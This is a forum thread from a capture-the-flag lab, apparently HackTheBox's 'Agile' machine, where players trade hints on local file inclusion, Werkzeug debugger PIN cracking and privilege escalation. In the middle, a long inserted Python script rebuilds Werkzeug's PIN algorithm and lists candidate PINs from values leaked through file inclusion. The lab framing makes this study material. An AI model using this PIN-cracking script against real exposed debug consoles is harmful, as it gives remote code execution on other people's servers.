Official Agile Discussion

Yes, I did.
I generated a new OpenVPN file and connected again. (Make sure you are connecting to Seasonal.) After that I was able to ping the machine.

1 Like

Still struggling with the PIN exploit. I thought that I got everything right through the LFI, but none of the generated PINs work…

And why can't one use the LFI itself to get a shell? I couldn't locate any log file, and /proc/self/environ didn't show the user agent at all…

No way through LFI to shell?

I suggest you emulate the same environment you would have on the box, also using the same ‘app.py’. You would find the only piece of the public bits you are probably missing.

Man, I've tried emulating this environment in many different ways and still can't get the correct PIN. Even when I'm using the exact copy of app.py, and I double-checked all the info there (port, secret_key, etc.), I still can't get it to work. Am I missing something? Are there any other files that I should look at?

You can DM me with the code, and I will check what you are missing.

For anyone still stuck on the PIN, there's a very helpful blog post if one were to google-fu "werkzeug pin cracking". The post in question takes into account the multiple possibilities of machine-id, md5 vs. sha1, etc., and generates a list of possible PINs. If one were to enumerate the box hard enough to include sufficient permutational parameters, the PIN is crackable.

As one additional hint, the blog post is very new, and my heart goes out to the poor souls who wouldn't have been able to find this post for about the first week after the machine came out.

3 Likes

Another additional hint for the brave ones who want to crack the PIN.

When you start a standalone Flask app on your local machine for debugging, you'll have the wrong names. Look closer at how the app starts: who starts it, and how. Then reproduce this method locally and see how the PIN changes.

Thx.
I found the latest blog post about werkzeug PIN cracking and finally my script worked.
The key is modname and appname: it's not always flask.app, Flask.

When you reproduce it locally you will notice that it generates two PINs. By adding some debugging prints in the code, you will notice that the appname is different for the first one… you should try to use this name instead :grinning:
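The posts above (the md5-vs-sha1 / machine-id hint, and the modname/appname hint) describe the inputs to Werkzeug's debugger PIN without showing the calculation. As an added example written for this thread, not code from any post, from the box, or from the blog post mentioned, here is a re-implementation of Werkzeug's get_pin_and_cookie_name() together with an enumerator that tries the variants the posts talk about: both hash functions, the machine-id with and without the cgroup suffix that newer Werkzeug appends, and several (modname, appname) pairs. All sample values (username, module path, MAC, machine-id, cgroup line) are constructed placeholders; the ("flask.app", "wsgi_app") pair is an assumed alternative to check against your own local reproduction, as the posts advise, not a statement about the box.

```python
from __future__ import annotations

import hashlib
import itertools
import re
from typing import Iterable, Sequence, Union

Bit = Union[str, bytes, None]
PIN_RE = re.compile(r"^\d{3}-\d{3}-\d{3}$")


def werkzeug_pin(probably_public_bits: Sequence[Bit],
                 private_bits: Sequence[Bit],
                 hash_name: str = "sha1") -> tuple[str, str]:
    """Re-implementation of werkzeug.debug.get_pin_and_cookie_name().

    probably_public_bits: [username, modname, appname, path of the module file]
    private_bits:         [str(uuid.getnode()), get_machine_id()]
    hash_name:            "sha1" for Werkzeug >= 2.0, "md5" for older releases.
    Returns (pin, cookie_name); the cookie name is a useful sanity check
    because the browser receives it once the right PIN is entered.
    """
    h = hashlib.new(hash_name)
    for bit in itertools.chain(probably_public_bits, private_bits):
        if not bit:                      # Werkzeug skips None / empty bits
            continue
        if isinstance(bit, str):
            bit = bit.encode("utf-8")    # bytes (machine id) are hashed as-is
        h.update(bit)
    h.update(b"cookiesalt")
    cookie_name = f"__wzd{h.hexdigest()[:20]}"

    h.update(b"pinsalt")                 # same hash object, salted once more
    num = f"{int(h.hexdigest(), 16):09d}"[:9]

    for group_size in (5, 4, 3):         # nine digits always end up as 3-3-3
        if len(num) % group_size == 0:
            pin = "-".join(num[i:i + group_size].rjust(group_size, "0")
                           for i in range(0, len(num), group_size))
            break
    else:
        pin = num
    return pin, cookie_name


def mac_to_node(mac: str) -> str:
    """MAC from /sys/class/net/<iface>/address -> str(uuid.getnode())."""
    return str(int(mac.strip().replace(":", ""), 16))


def machine_id_variants(machine_id: bytes, cgroup_first_line: bytes) -> list[bytes]:
    """Candidate get_machine_id() values.

    Current Werkzeug appends the last path segment of the first line of
    /proc/self/cgroup to /etc/machine-id (or boot_id when that is missing);
    older releases hash the machine-id alone, so both forms are returned.
    """
    base = machine_id.strip()
    suffix = cgroup_first_line.strip().rpartition(b"/")[2]
    return [base, base + suffix] if suffix else [base]


def candidate_pins(username: str | None,
                   mod_app_pairs: Iterable[tuple[str, str]],
                   module_file: str,
                   mac: str,
                   machine_ids: Iterable[bytes]) -> list[dict]:
    """Enumerate every PIN the observed environment could yield (deduplicated)."""
    node = mac_to_node(mac)
    results: list[dict] = []
    seen: set[str] = set()
    for (modname, appname), mid, hname in itertools.product(
            list(mod_app_pairs), list(machine_ids), ("sha1", "md5")):
        pin, cookie = werkzeug_pin([username, modname, appname, module_file],
                                   [node, mid], hname)
        if pin in seen:
            continue
        seen.add(pin)
        results.append({"pin": pin, "cookie": cookie, "modname": modname,
                        "appname": appname, "hash": hname, "machine_id": mid})
    return results


# Constructed placeholder values; on a real target they come from the LFI
# (/etc/machine-id, /proc/self/cgroup, /sys/class/net/<iface>/address,
# the running user, and the path of the module the app object lives in).
SAMPLE = dict(
    username="www-data",
    mod_app_pairs=[("flask.app", "Flask"), ("flask.app", "wsgi_app")],  # assumed pairs
    module_file="/opt/app/venv/lib/python3.10/site-packages/flask/app.py",
    mac="00:0c:29:12:34:56",
    machine_ids=machine_id_variants(
        b"1a2b3c4d5e6f70819293a4b5c6d7e8f9\n",
        b"0::/system.slice/example.service\n"),
)

if __name__ == "__main__":
    for c in candidate_pins(**SAMPLE):
        print(c["pin"], c["hash"], c["appname"], c["machine_id"].decode(), c["cookie"])
```

Run it locally first against your own reproduction of the app, printing the bits from a patched copy of Werkzeug, and confirm the script reproduces the local PIN before pointing it at the target; a list of eight or so candidates is cheap to try by hand, and the cookie name lets you confirm which combination was right.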

I think I'm in the last stage.

  • I managed to get a foothold
  • I managed to move quite horizontally within the system

But I feel like I'm missing something for the root part :sneezing_face:

Debugging connection was closed reason: websocket disconnected :smiling_face_with_tear:

Use sudo -l; when there is something, it is most of the time vulnerable :heart:

I don't know why, but it works now.
May need a reset.

How do I set a DNS record for su*******.htb? Is there any way to set a record in /etc/hosts that auto-resolves all .htb domains?

Thank you

I managed to finish the machine. It took me time, but I was up to it.

DM me

Hi,
I rooted the box today, but I think I didn't pass one of the steps correctly.
Can I DM someone who has finished the box to share the steps I made, to see if I benefited from a change made by someone else?
Thx

I am trying to generate the PIN to use the console, but the PIN is always incorrect.

I need some help to know exactly which attribute is incorrect while I am generating the PIN.

Hi,
I managed to gain RCE with a shell as an unprivileged user. However, I’m having trouble finding credentials to connect via SSH as another unprivileged user that I need to escalate my privileges further. I’ve tried various methods, including searching through configuration files, attempting to crack password hashes, and checking for any plaintext passwords, but I haven’t had any luck so far.

I would appreciate it if someone could provide me with some hints without spoiling :wink:
Thanks in advance!